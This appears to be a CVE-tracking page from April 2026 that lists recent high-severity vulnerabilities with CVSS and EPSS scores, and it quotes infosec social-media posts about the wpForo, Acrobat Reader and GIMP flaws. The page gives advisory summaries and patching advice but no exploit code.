## Updated at UTC 2026-04-11T15:31:13.081971

Access data as JSON

CVE CVSS EPSS Posts Repos Nuclei Updated Description
CVE-2026-5809 7.1 0.03% 2 0 2026-04-11T08:16:05.503000 The wpForo Forum plugin for WordPress is vulnerable to Arbitrary File Deletion i
CVE-2026-34621 9.6 0.24% 4 0 2026-04-11T07:16:03.633000 Acrobat Reader versions 24.001.30356, 26.001.21367 and earlier are affected by a
CVE-2026-4152 7.8 0.06% 2 0 2026-04-11T03:30:41 GIMP JP2 File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerabi
CVE-2026-4151 7.8 0.06% 2 0 2026-04-11T03:30:41 GIMP ANI File Parsing Integer Overflow Remote Code Execution Vulnerability. This
CVE-2026-4150 7.8 0.06% 2 0 2026-04-11T03:30:41 GIMP PSD File Parsing Integer Overflow Remote Code Execution Vulnerability. This
CVE-2026-4157 7.5 0.19% 2 0 2026-04-11T03:30:41 ChargePoint Home Flex revssh Service Command Injection Remote Code Execution Vul
CVE-2026-4156 7.5 0.07% 2 0 2026-04-11T03:30:41 ChargePoint Home Flex OCPP getpreq Stack-based Buffer Overflow Remote Code Execu
CVE-2026-4155 7.5 0.24% 2 0 2026-04-11T03:30:41 ChargePoint Home Flex Inclusion of Sensitive Information in Source Code Informat
CVE-2026-5494 7.8 0.05% 4 0 2026-04-11T03:30:41 Labcenter Electronics Proteus PDSPRJ File Parsing Out-Of-Bounds Write Remote Cod
CVE-2026-5059 9.8 1.01% 4 0 2026-04-11T03:30:41 aws-mcp-server AWS CLI Command Injection Remote Code Execution Vulnerability. Th
CVE-2026-5495 7.8 0.05% 2 0 2026-04-11T03:30:41 Labcenter Electronics Proteus PDSPRJ File Parsing Out-Of-Bounds Write Remote Cod
CVE-2026-5493 7.8 0.05% 2 0 2026-04-11T03:30:41 Labcenter Electronics Proteus PDSPRJ File Parsing Out-Of-Bounds Write Remote Cod
CVE-2026-5058 9.8 1.01% 2 0 2026-04-11T03:30:41 aws-mcp-server Command Injection Remote Code Execution Vulnerability. This vulne
CVE-2026-5144 8.8 0.05% 2 0 2026-04-11T03:30:41 The BuddyPress Groupblog plugin for WordPress is vulnerable to Privilege Escalat
CVE-2026-5496 7.8 0.05% 4 0 2026-04-11T01:16:18.830000 Labcenter Electronics Proteus PDSPRJ File Parsing Type Confusion Remote Code Exe
CVE-2026-5055 7.8 0.01% 2 0 2026-04-11T01:16:18.017000 NoMachine Uncontrolled Search Path Element Local Privilege Escalation Vulnerabil
CVE-2026-5054 7.8 0.01% 2 0 2026-04-11T01:16:17.890000 NoMachine External Control of File Path Local Privilege Escalation Vulnerability
CVE-2026-4154 7.8 0.06% 2 0 2026-04-11T01:16:17.093000 GIMP XPM File Parsing Integer Overflow Remote Code Execution Vulnerability. This
CVE-2026-4153 7.8 0.06% 2 0 2026-04-11T01:16:16.963000 GIMP PSP File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerabi
CVE-2026-4149 10.0 1.27% 6 0 2026-04-11T01:16:16.430000 Sonos Era 300 SMB Response Out-Of-Bounds Access Remote Code Execution Vulnerabil
CVE-2026-40188 7.7 0.03% 2 0 2026-04-10T21:37:28 ### Summary The SFTP command rename sanitizes only the source path and not the d
CVE-2026-5483 8.6 0.06% 2 0 2026-04-10T21:31:15 A flaw was found in odh-dashboard in Red Hat Openshift AI. This vulnerability in
CVE-2026-6057 9.8 0.13% 1 0 2026-04-10T21:16:28.800000 FalkorDB Browser 1.9.3 contains an unauthenticated path traversal vulnerability
CVE-2026-40189 0 0.10% 4 0 2026-04-10T20:16:23.890000 goshs is a SimpleHTTPServer written in Go. Prior to 2.0.0-beta.4, goshs enforces
CVE-2026-40175 10.0 0.24% 2 0 2026-04-10T20:16:22.800000 Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.
CVE-2026-40093 9.1 0.06% 1 0 2026-04-10T19:55:04 ### Impact Block timestamp validation enforces that `timestamp >= parent.timest
CVE-2026-35641 8.6 0.01% 2 0 2026-04-10T19:45:22 > Fixed in OpenClaw 2026.3.24, the current shipping release. ### Summary During
CVE-2026-35643 8.8 0.04% 4 0 2026-04-10T19:38:05 ## Summary Android Canvas WebView pages from untrusted origins could invoke the
CVE-2026-35666 8.8 0.04% 2 0 2026-04-10T19:37:45 ## Summary Allow-always exec approvals did not unwrap /usr/bin/time, so an unreg
CVE-2026-35595 8.3 0.03% 2 0 2026-04-10T19:36:16 ## Summary A user with Write-level access to a project can escalate their permi
CVE-2026-40163 8.2 0.08% 2 0 2026-04-10T19:30:28 ### Summary Two unauthenticated path traversal vulnerabilities exist in Saltcor
CVE-2026-40156 7.8 0.02% 2 0 2026-04-10T19:26:45 PraisonAI automatically loads a file named `tools.py` from the current working d
CVE-2026-40158 8.6 0.03% 4 0 2026-04-10T19:25:40 PraisonAI's AST-based Python sandbox can be bypassed using `type.__getattribute_
CVE-2026-40150 7.7 0.03% 1 0 2026-04-10T19:23:58 ## Summary The `web_crawl()` function in `praisonaiagents/tools/web_crawl_tools
CVE-2026-40116 7.5 0.03% 1 0 2026-04-10T19:22:52 ## Summary The `/media-stream` WebSocket endpoint in PraisonAI's call module ac
CVE-2026-40113 8.4 0.02% 1 0 2026-04-10T19:22:37 **Summary** deploy.py constructs a single comma-delimited string for the gcloud
CVE-2026-34179 9.1 0.09% 1 0 2026-04-10T19:20:52 ### Summary A restricted TLS certificate user can escalate to cluster admin by
CVE-2026-33707 9.4 0.07% 4 0 2026-04-10T19:16:23.950000 Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, th
CVE-2026-40200 8.2 0.01% 4 0 2026-04-10T18:31:28 An issue was discovered in musl libc 0.7.10 through 1.2.6. Stack-based memory co
CVE-2026-32931 7.5 0.16% 2 0 2026-04-10T18:16:42.430000 Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, an
CVE-2026-31941 7.7 0.03% 2 0 2026-04-10T18:16:41.640000 Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Ch
CVE-2026-35663 None 0.04% 2 0 2026-04-10T17:28:09 ## Summary Gateway Backend Reconnect lets Non-Admin Operator Scopes Self-Claim
CVE-2026-35660 None 0.04% 2 0 2026-04-10T17:27:04 ## Summary Before `v2026.3.23`, the Gateway `agent` RPC accepted `/reset` and `/
CVE-2026-35653 8.1 0.04% 2 0 2026-04-10T17:24:51 > Fixed in OpenClaw 2026.3.24, the current shipping release. # Title `browser.
CVE-2026-40157 0 0.07% 2 0 2026-04-10T17:17:13.457000 PraisonAI is a multi-agent teams system. Prior to 4.5.128, cmd_unpack in the rec
CVE-2026-35669 8.8 0.04% 2 0 2026-04-10T17:17:09.240000 OpenClaw before 2026.3.25 contains a privilege escalation vulnerability in gatew
CVE-2026-35668 7.7 0.05% 4 0 2026-04-10T17:17:09.060000 OpenClaw before 2026.3.24 contains a path traversal vulnerability in sandbox enf
CVE-2026-35650 7.5 0.06% 2 0 2026-04-10T17:17:05.627000 OpenClaw before 2026.3.22 contains an environment variable override handling vul
CVE-2026-6067 7.5 0.06% 2 0 2026-04-10T16:16:36.437000 A heap buffer overflow vulnerability exists in the Netwide Assembler (NASM) due
CVE-2025-58913 8.1 0.11% 2 0 2026-04-10T15:32:07 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP
CVE-2026-40217 8.8 0.19% 2 0 2026-04-10T15:32:07 LiteLLM through 2026-04-08 allows remote attackers to execute arbitrary code via
CVE-2026-33092 7.8 0.01% 2 0 2026-04-10T15:32:05 Local privilege escalation due to improper handling of environment variables. Th
CVE-2026-40088 9.7 0.05% 1 0 2026-04-10T14:41:51 The `execute_command` function and workflow shell execution are exposed to user-
CVE-2025-5804 7.5 0.07% 2 0 2026-04-10T14:16:25.450000 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP
CVE-2026-5412 9.9 0.04% 2 0 2026-04-10T13:16:45.780000 In Juju versions prior to 2.9.57 and 3.6.21, an authorization issue exists in th
CVE-2026-1115 9.6 0.04% 1 0 2026-04-10T13:16:43.970000 A Stored Cross-Site Scripting (XSS) vulnerability was identified in the social f
CVE-2026-6029 9.8 0.89% 1 0 2026-04-10T09:31:21 A vulnerability was detected in Totolink A7100RU 7.4cu.2313_b20191024. The affec
CVE-2026-6025 9.8 0.89% 1 0 2026-04-10T06:31:49 A vulnerability was identified in Totolink A7100RU 7.4cu.2313_b20191024. This af
CVE-2026-6016 8.8 0.05% 1 0 2026-04-10T06:31:44 A vulnerability was found in Tenda AC9 15.03.02.13. The affected element is the
CVE-2026-6014 8.8 0.04% 1 0 2026-04-10T06:31:44 A flaw has been found in D-Link DIR-513 1.10. This issue affects the function fo
CVE-2026-6013 8.8 0.04% 1 0 2026-04-10T06:31:44 A vulnerability was detected in D-Link DIR-513 1.10. This vulnerability affects
CVE-2026-6015 8.8 0.05% 1 0 2026-04-10T06:16:06.510000 A vulnerability has been found in Tenda AC9 15.03.02.13. Impacted is the functio
CVE-2026-6012 8.8 0.04% 1 0 2026-04-10T05:16:07.027000 A security vulnerability has been detected in D-Link DIR-513 1.10. This affects
CVE-2026-5994 9.8 0.89% 2 0 2026-04-10T03:31:16 A security flaw has been discovered in Totolink A7100RU 7.4cu.2313_b20191024. Th
CVE-2026-5996 9.8 0.89% 2 0 2026-04-10T03:31:16 A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191
CVE-2026-5993 9.8 0.89% 1 0 2026-04-10T03:31:16 A vulnerability was identified in Totolink A7100RU 7.4cu.2313_b20191024. This vu
CVE-2026-25203 7.8 0.01% 1 0 2026-04-10T03:31:16 Samsung MagicINFO 9 Server Incorrect Default Permissions Local Privilege Escalat
CVE-2026-4351 8.1 0.06% 1 0 2026-04-10T03:31:16 The Perfmatters plugin for WordPress is vulnerable to arbitrary file overwrite v
CVE-2026-3360 7.5 0.10% 1 0 2026-04-10T03:31:16 The Tutor LMS – eLearning and online course solution plugin for WordPress is vul
CVE-2026-5997 9.8 0.89% 2 0 2026-04-10T02:16:04.247000 A vulnerability was detected in Totolink A7100RU 7.4cu.2313_b20191024. The impac
CVE-2026-33170 None 0.01% 2 0 2026-04-10T01:59:00 ### Impact `SafeBuffer#%` does not propagate the `@html_unsafe` flag to the newl
CVE-2026-5995 9.8 0.89% 2 0 2026-04-10T01:16:42.490000 A weakness has been identified in Totolink A7100RU 7.4cu.2313_b20191024. Impacte
CVE-2026-35638 8.8 0.04% 1 0 2026-04-10T00:30:38 OpenClaw before 2026.3.22 contains a privilege escalation vulnerability in the C
CVE-2026-5983 8.8 0.04% 1 0 2026-04-10T00:30:38 A vulnerability was determined in D-Link DIR-605L 2.13B01. This issue affects th
CVE-2026-5982 8.8 0.04% 1 0 2026-04-10T00:30:38 A vulnerability was found in D-Link DIR-605L 2.13B01. This vulnerability affects
CVE-2026-5981 8.8 0.04% 1 0 2026-04-10T00:30:38 A vulnerability has been found in D-Link DIR-605L 2.13B01. This affects the func
CVE-2026-5988 8.8 0.05% 1 0 2026-04-10T00:30:38 A vulnerability was detected in Tenda F451 1.0.0.7. This impacts the function fo
CVE-2026-5992 8.8 0.05% 1 0 2026-04-10T00:30:38 A vulnerability was determined in Tenda F451 1.0.0.7. This affects the function
CVE-2026-5991 8.8 0.05% 1 0 2026-04-10T00:30:38 A vulnerability was found in Tenda F451 1.0.0.7. Affected by this issue is the f
CVE-2026-5989 8.8 0.05% 1 0 2026-04-10T00:30:38 A flaw has been found in Tenda F451 1.0.0.7. Affected is the function fromRouteS
CVE-2026-33778 7.5 0.06% 1 0 2026-04-10T00:30:37 An Improper Validation of Syntactic Correctness of Input vulnerability in the I
CVE-2026-33785 8.8 0.01% 1 0 2026-04-10T00:30:37 A Missing Authorization vulnerability in the CLI of Juniper Networks Junos OS on
CVE-2026-33790 7.5 0.04% 1 0 2026-04-10T00:30:37 An Improper Check for Unusual or Exceptional Conditions vulnerability in the flo
CVE-2026-33793 7.8 0.01% 1 0 2026-04-10T00:30:37 An Execution with Unnecessary Privileges vulnerability in the User Interface (UI
CVE-2026-35625 7.8 0.03% 1 0 2026-04-10T00:30:37 OpenClaw before 2026.3.25 contains a privilege escalation vulnerability where si
CVE-2026-35645 8.1 0.03% 1 0 2026-04-10T00:30:37 OpenClaw before 2026.3.25 contains a privilege escalation vulnerability in the g
CVE-2026-33788 7.8 0.02% 1 0 2026-04-10T00:30:30 A Missing Authentication for Critical Function vulnerability in the Flexible PIC
CVE-2026-5990 8.8 0.05% 1 0 2026-04-10T00:16:36.363000 A vulnerability has been found in Tenda F451 1.0.0.7. Affected by this vulnerabi
CVE-2026-34424 9.8 0.15% 2 0 2026-04-09T23:17:00.540000 Smart Slider 3 Pro version 3.5.1.35 for WordPress and Joomla contains a multi-st
CVE-2026-5984 8.8 0.02% 1 0 2026-04-09T22:16:37.873000 A vulnerability was identified in D-Link DIR-605L 2.13B01. Impacted is the funct
CVE-2026-40154 9.3 0.03% 2 0 2026-04-09T22:16:36.503000 PraisonAI is a multi-agent teams system. Prior to 4.5.128, PraisonAI treats remo
CVE-2026-40149 7.9 0.01% 1 0 2026-04-09T22:16:35.750000 PraisonAI is a multi-agent teams system. Prior to 4.5.128, the gateway's /api/ap
CVE-2026-35639 8.8 0.20% 1 0 2026-04-09T22:16:33.317000 OpenClaw before 2026.3.22 contains a privilege escalation vulnerability in the d
CVE-2026-34512 8.1 0.03% 1 0 2026-04-09T22:16:29.757000 OpenClaw before 2026.3.25 contains an improper access control vulnerability in t
CVE-2026-33784 9.8 0.04% 1 0 2026-04-09T22:16:27.820000 A Use of Default Password vulnerability in the Juniper Networks Support Insigh
CVE-2025-13914 8.7 0.03% 1 0 2026-04-09T22:16:22.697000 A Key Exchange without Entity Authentication vulnerability in the SSH implementa
CVE-2026-5978 9.8 0.89% 1 0 2026-04-09T21:31:37 A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191
CVE-2026-5977 9.8 0.89% 1 0 2026-04-09T21:31:37 A weakness has been identified in Totolink A7100RU 7.4cu.2313_b20191024. This im
CVE-2026-5980 8.8 0.04% 1 0 2026-04-09T21:31:37 A flaw has been found in D-Link DIR-605L 2.13B01. Affected by this issue is the
CVE-2026-5975 9.8 0.89% 1 0 2026-04-09T21:31:36 A vulnerability was identified in Totolink A7100RU 7.4cu.2313_b20191024. The imp
CVE-2026-5979 8.8 0.04% 1 0 2026-04-09T21:16:13.967000 A vulnerability was detected in D-Link DIR-605L 2.13B01. Affected by this vulner
CVE-2026-5976 9.8 0.89% 1 0 2026-04-09T20:16:29.763000 A security flaw has been discovered in Totolink A7100RU 7.4cu.2313_b20191024. Th
CVE-2026-39987 0 2.70% 2 0 template 2026-04-09T18:17:02.807000 marimo is a reactive Python notebook. Prior to 0.23.0, Marimo has a Pre-Auth RCE
CVE-2026-39885 7.5 0.03% 1 0 2026-04-09T14:29:54 ## Summary The `mcp-from-openapi` library uses `@apidevtools/json-schema-ref-pa
CVE-2026-39891 8.8 0.05% 2 0 2026-04-09T14:29:51 ## Summary Direct insertion of unescaped user input into template-rendering tool
CVE-2026-39890 9.8 0.29% 1 0 2026-04-09T14:29:47 ## Summary The `AgentService.loadAgentFromFile` method uses the `js-yaml` librar
CVE-2026-39889 7.5 0.04% 2 0 2026-04-09T14:29:17 The A2U (Agent-to-User) event stream server in PraisonAI exposes all agent activ
CVE-2026-39429 8.2 0.07% 1 0 2026-04-09T14:28:53 ### Summary The cache server is directly exposed by the root shard and has no a
CVE-2024-1490 7.2 0.08% 1 0 2026-04-09T12:31:22 An authenticated remote attacker with high privileges can exploit the OpenVPN co
CVE-2026-5852 9.8 0.89% 1 0 2026-04-09T09:31:56 A weakness has been identified in Totolink A7100RU 7.4cu.2313_b20191024. Affecte
CVE-2026-5854 9.8 0.23% 1 0 2026-04-09T09:31:56 A vulnerability was detected in Totolink A7100RU 7.4cu.2313_b20191024. Affected
CVE-2026-5853 9.8 0.89% 1 0 2026-04-09T07:16:05.273000 A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191
CVE-2026-5850 9.8 0.89% 2 0 2026-04-09T06:30:36 A vulnerability was identified in Totolink A7100RU 7.4cu.2313_b20191024. This af
CVE-2026-5851 9.8 0.89% 2 0 2026-04-09T06:30:35 A security flaw has been discovered in Totolink A7100RU 7.4cu.2313_b20191024. Th
CVE-2026-1830 9.8 0.18% 2 0 2026-04-09T06:30:35 The Quick Playground plugin for WordPress is vulnerable to Remote Code Execution
CVE-2026-5844 7.2 0.19% 1 0 2026-04-09T05:16:06.653000 A vulnerability was found in D-Link DIR-882 1.01B02. Impacted is the function sp
CVE-2026-4326 8.8 0.08% 1 0 2026-04-09T03:31:24 The Vertex Addons for Elementor plugin for WordPress is vulnerable to Missing Au
CVE-2026-5830 8.8 0.05% 1 0 2026-04-09T03:31:24 A vulnerability was identified in Tenda AC15 15.03.05.18. This affects the funct
CVE-2026-5173 8.5 0.02% 2 1 2026-04-09T00:32:08 GitLab has remediated an issue in GitLab CE/EE affecting all versions from 16.9.
CVE-2026-5815 8.8 0.08% 1 0 2026-04-09T00:32:08 A vulnerability was detected in D-Link DIR-645 1.01/1.02/1.03. Impacted is the f
CVE-2026-3199 None 0.07% 1 0 2026-04-09T00:32:08 A vulnerability in the task management component of Sonatype Nexus Repository ve
CVE-2026-40031 7.8 0.01% 2 0 2026-04-09T00:32:07 MemProcFS before 5.17 contains multiple unsafe library-loading patterns that ena
CVE-2026-40032 7.8 0.02% 1 0 2026-04-09T00:32:07 UAC (Unix-like Artifacts Collector) before 3.3.0-rc1 contains a command injectio
CVE-2026-40029 7.8 0.02% 1 0 2026-04-09T00:32:07 parseusbs before 1.9 contains an OS command injection vulnerability in parseUSBs
CVE-2026-40035 9.1 0.10% 2 0 2026-04-09T00:32:07 Unfurl through 2025.08 contains an improper input validation vulnerability in co
CVE-2026-1092 7.5 0.02% 1 0 2026-04-09T00:32:01 GitLab has remediated an issue in GitLab CE/EE affecting all versions from 12.10
CVE-2025-12664 7.5 0.02% 1 0 2026-04-08T23:16:56.200000 GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.0
CVE-2026-5859 0 0.03% 1 0 2026-04-08T22:16:25.383000 Integer overflow in WebML in Google Chrome prior to 147.0.7727.55 allowed a remo
CVE-2026-40036 7.5 0.10% 1 0 2026-04-08T22:16:24.190000 Unfurl before 2026.04 contains an unbounded zlib decompression vulnerability in
CVE-2026-40030 7.8 0.02% 1 0 2026-04-08T22:16:23.483000 parseusbs before 1.9 contains an OS command injection vulnerability where the vo
CVE-2026-1340 9.8 67.82% 3 2 2026-04-08T21:34:17 A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve
CVE-2026-2942 9.8 0.13% 1 0 2026-04-08T21:33:41 The ProSolution WP Client plugin for WordPress is vulnerable to arbitrary file u
CVE-2026-25776 9.8 0.05% 1 0 2026-04-08T21:26:35.910000 Movable Type provided by Six Apart Ltd. contains a code injection vulnerability
CVE-2026-5208 8.2 0.05% 1 0 2026-04-08T21:26:13.410000 Command injection in alerts in CoolerControl/coolercontrold <4.0.0 allows authen
CVE-2026-39394 8.1 0.02% 1 0 2026-04-08T21:26:13.410000 CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, mo
CVE-2026-33756 7.5 0.08% 1 0 2026-04-08T21:26:13.410000 Saleor is an e-commerce platform. From 2.0.0 to before 3.23.0a3, 3.22.47, 3.21.5
CVE-2026-35401 7.5 0.04% 1 0 2026-04-08T21:26:13.410000 Saleor is an e-commerce platform. From 2.0.0 to before 3.23.0a3, 3.22.47, 3.21.5
CVE-2026-23869 7.5 0.32% 1 2 2026-04-08T21:26:13.410000 A denial of service vulnerability exists in React Server Components, affecting t
CVE-2026-5436 8.1 0.18% 1 0 2026-04-08T21:26:13.410000 The MW WP Form plugin for WordPress is vulnerable to Arbitrary File Move/Read in
CVE-2026-39888 9.9 0.08% 1 0 2026-04-08T21:25:14.927000 PraisonAI is a multi-agent teams system. Prior to 1.5.115, execute_code() in pra
CVE-2026-39393 8.1 0.01% 1 0 2026-04-08T19:15:59 ## Summary The install route guard in ci4ms relies solely on a volatile cache c
CVE-2026-4338 7.5 0.04% 1 0 2026-04-08T18:35:58 The ActivityPub WordPress plugin before 8.0.2 does not properly filter posts to
CVE-2026-33466 8.1 0.28% 1 0 2026-04-08T18:34:20 Improper Limitation of a Pathname to a Restricted Directory (CWE-22) in Logstash
CVE-2026-33461 7.7 0.06% 1 0 2026-04-08T18:34:08 Incorrect Authorization (CWE-863) in Kibana can lead to information disclosure v
CVE-2026-4498 7.7 0.05% 1 0 2026-04-08T18:34:08 Execution with Unnecessary Privileges (CWE-250) in Kibana’s Fleet plugin debug r
CVE-2026-27806 7.8 0.01% 1 0 2026-04-08T18:03:54 ## Summary The Orbit agent's FileVault disk encryption key rotation flow on col
CVE-2026-28261 7.8 0.01% 1 0 2026-04-08T15:31:50 Dell Elastic Cloud Storage, version 3.8.1.7 and prior, and Dell ObjectScale, ver
CVE-2026-5301 7.6 0.02% 1 0 2026-04-08T15:31:50 Stored XSS in log viewer in CoolerControl/coolercontrol-ui <4.0.0 allows unauthe
CVE-2026-3396 7.5 0.08% 1 0 2026-04-08T12:31:36 WCAPF – WooCommerce Ajax Product Filter plugin is vulnerable to time-based SQL I
CVE-2026-3243 8.8 0.20% 1 0 2026-04-08T12:31:36 The Advanced Members for ACF plugin for WordPress is vulnerable to arbitrary fil
CVE-2026-3535 9.8 0.28% 1 0 2026-04-08T09:31:42 The DSGVO Google Web Fonts GDPR plugin for WordPress is vulnerable to arbitrary
CVE-2026-34197 8.8 5.60% 1 6 template 2026-04-07T15:30:49 Improper Input Validation, Improper Control of Generation of Code ('Code Injecti
CVE-2026-35616 9.8 25.25% 1 5 template 2026-04-06T18:12:57.863000 A improper access control vulnerability in Fortinet FortiClientEMS 7.4.5 through
CVE-2026-34040 8.8 0.01% 1 0 2026-04-03T16:51:28.670000 Moby is an open source container framework. Prior to version 29.3.1, a security
CVE-2026-34504 8.3 0.05% 2 0 2026-04-02T12:20:31.950000 OpenClaw before 2026.3.28 contains a server-side request forgery vulnerability i
CVE-2026-21643 9.8 13.70% 1 2 template 2026-03-30T13:16:22.063000 An improper neutralization of special elements used in an sql command ('sql inje
CVE-2026-27654 8.2 0.03% 2 1 2026-03-24T15:30:36 NGINX Open Source and NGINX Plus have a vulnerability in the ngx_http_dav_module
CVE-2026-32011 7.5 0.06% 1 0 2026-03-20T21:13:05 ## Impact OpenClaw webhook handlers for BlueBubbles and Google Chat accepted an
CVE-2026-3497 None 0.03% 1 0 2026-03-18T21:34:00 Vulnerability in the OpenSSH GSSAPI delta included in various Linux distribution
CVE-2026-23060 5.5 0.01% 1 0 2026-03-13T21:32:48 In the Linux kernel, the following vulnerability has been resolved: crypto: aut
CVE-2026-20127 10.0 39.66% 2 6 2026-02-25T18:31:45 A vulnerability in the peering authentication in Cisco Catalyst SD-WAN Controlle
CVE-2026-27486 None 0.04% 1 0 2026-02-23T22:28:51 ## Summary OpenClaw CLI process cleanup used system-wide process enumeration an
CVE-2026-1281 9.8 71.80% 1 2 2026-01-30T00:31:29 A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve
CVE-2026-22200 7.5 74.45% 2 2 template 2026-01-27T21:31:40 Enhancesoft osTicket versions up to and including 1.18.2 contain an arbitrary fi
CVE-2025-68161 None 0.03% 1 0 2025-12-19T22:08:03 The Socket Appender in Apache Log4j Core versions 2.0-beta9 through 2.25.2 does
CVE-2025-6218 7.8 4.76% 1 6 2025-12-09T21:31:29 RARLAB WinRAR Directory Traversal Remote Code Execution Vulnerability. This vuln
CVE-2025-55182 10.0 84.89% 2 100 template 2025-12-09T16:53:25 ### Impact There is an unauthenticated remote code execution vulnerability in R
CVE-2025-8088 8.8 7.05% 1 32 2025-10-22T00:34:26 A path traversal vulnerability affecting the Windows version of WinRAR allows th
CVE-2024-27297 6.3 0.05% 1 0 2025-06-27T13:15:23.240000 Nix is a package manager for Linux and other Unix systems. A fixed-output deriva
CVE-2024-34359 9.6 56.67% 1 0 2024-11-21T09:18:30.130000 llama-cpp-python is the Python bindings for llama.cpp. `llama-cpp-python` depend
CVE-2020-8562 2.2 0.06% 1 0 2024-11-21T05:39:02.180000 As mitigations to a report from 2019 and CVE-2020-8555, Kubernetes attempts to p
CVE-2026-32892 0 0.19% 4 0 N/A
CVE-2026-31940 0 0.04% 2 0 N/A
CVE-2026-31939 0 0.04% 2 0 N/A
CVE-2026-33618 0 0.05% 2 0 N/A
CVE-2026-33710 0 0.03% 2 0 N/A
CVE-2026-32252 0 0.02% 2 0 N/A
CVE-2026-33698 0 0.05% 2 0 N/A
CVE-2026-40168 0 0.04% 2 0 N/A
CVE-2026-40089 0 0.04% 1 0 N/A
CVE-2026-0234 0 0.00% 1 0 N/A
CVE-2026-0233 0 0.00% 1 0 N/A
CVE-2026-30461 0 0.00% 1 0 N/A
CVE-2026-34392 0 0.03% 1 0 N/A
CVE-2026-33350 0 0.03% 1 0 N/A
CVE-2026-35169 0 0.03% 1 0 N/A
CVE-2026-35446 0 0.03% 1 0 N/A
CVE-2026-35478 0 0.07% 1 0 N/A
CVE-2026-39863 0 0.11% 1 0 N/A
CVE-2026-39860 0 0.02% 1 0 N/A

CVE-2026-5809
(7.1 HIGH)

EPSS: 0.03%

updated 2026-04-11T08:16:05.503000

2 posts

The wpForo Forum plugin for WordPress is vulnerable to Arbitrary File Deletion in versions up to and including 3.0.2. This is due to a two-step logic flaw: the topic_add() and topic_edit() action handlers accept arbitrary user-supplied data[*] arrays from $_REQUEST and store them as postmeta without restricting which fields may contain array values. Because 'body' is included in the allowed topic

offseq at 2026-04-11T09:00:29.177Z ##

🛡️ CVE-2026-5809: HIGH severity vuln in wpForo Forum plugin ≤3.0.2 lets subscriber+ users delete arbitrary files (e.g., wp-config.php). No patch yet — restrict permissions & monitor topic edits for abuse. radar.offseq.com/threat/cve-20

##
offseq@infosec.exchange at 2026-04-11T09:00:29.000Z ##

🛡️ CVE-2026-5809: HIGH severity vuln in wpForo Forum plugin ≤3.0.2 lets subscriber+ users delete arbitrary files (e.g., wp-config.php). No patch yet — restrict permissions & monitor topic edits for abuse. radar.offseq.com/threat/cve-20 #OffSeq #WordPress #Vuln #InfoSec

##

CVE-2026-34621
(9.6 CRITICAL)

EPSS: 0.24%

updated 2026-04-11T07:16:03.633000

4 posts

Acrobat Reader versions 24.001.30356, 26.001.21367 and earlier are affected by an Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

offseq at 2026-04-11T11:30:30.340Z ##

🚨 CRITICAL: CVE-2026-34621 in Adobe Acrobat Reader (≤26.001.21367) enables arbitrary code execution via prototype pollution if a user opens a malicious file. No patch yet — exercise caution! radar.offseq.com/threat/cve-20

##
offseq at 2026-04-11T10:30:28.434Z ##

🚨 CRITICAL: CVE-2026-34621 in Adobe Acrobat Reader (≤26.001.21367) enables prototype pollution & arbitrary code execution via malicious files. No patch yet — avoid opening untrusted PDFs. Monitor advisories. radar.offseq.com/threat/cve-20

##
offseq@infosec.exchange at 2026-04-11T11:30:30.000Z ##

🚨 CRITICAL: CVE-2026-34621 in Adobe Acrobat Reader (≤26.001.21367) enables arbitrary code execution via prototype pollution if a user opens a malicious file. No patch yet — exercise caution! radar.offseq.com/threat/cve-20 #OffSeq #Adobe #Security

##
offseq@infosec.exchange at 2026-04-11T10:30:28.000Z ##

🚨 CRITICAL: CVE-2026-34621 in Adobe Acrobat Reader (≤26.001.21367) enables prototype pollution & arbitrary code execution via malicious files. No patch yet — avoid opening untrusted PDFs. Monitor advisories. radar.offseq.com/threat/cve-20 #OffSeq #Adobe #Vuln #Infosec

##

CVE-2026-4152
(7.8 HIGH)

EPSS: 0.06%

updated 2026-04-11T03:30:41

2 posts

GIMP JP2 File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JP2 files. The issue results f

thehackerwire@mastodon.social at 2026-04-11T04:00:10.000Z ##

🟠 CVE-2026-4152 - High (7.8)

GIMP JP2 File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerabilit...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T04:00:10.000Z ##

🟠 CVE-2026-4152 - High (7.8)

GIMP JP2 File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerabilit...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-4151
(7.8 HIGH)

EPSS: 0.06%

updated 2026-04-11T03:30:41

2 posts

GIMP ANI File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of ANI files. The issue results from the la

thehackerwire@mastodon.social at 2026-04-11T03:59:58.000Z ##

🟠 CVE-2026-4151 - High (7.8)

GIMP ANI File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
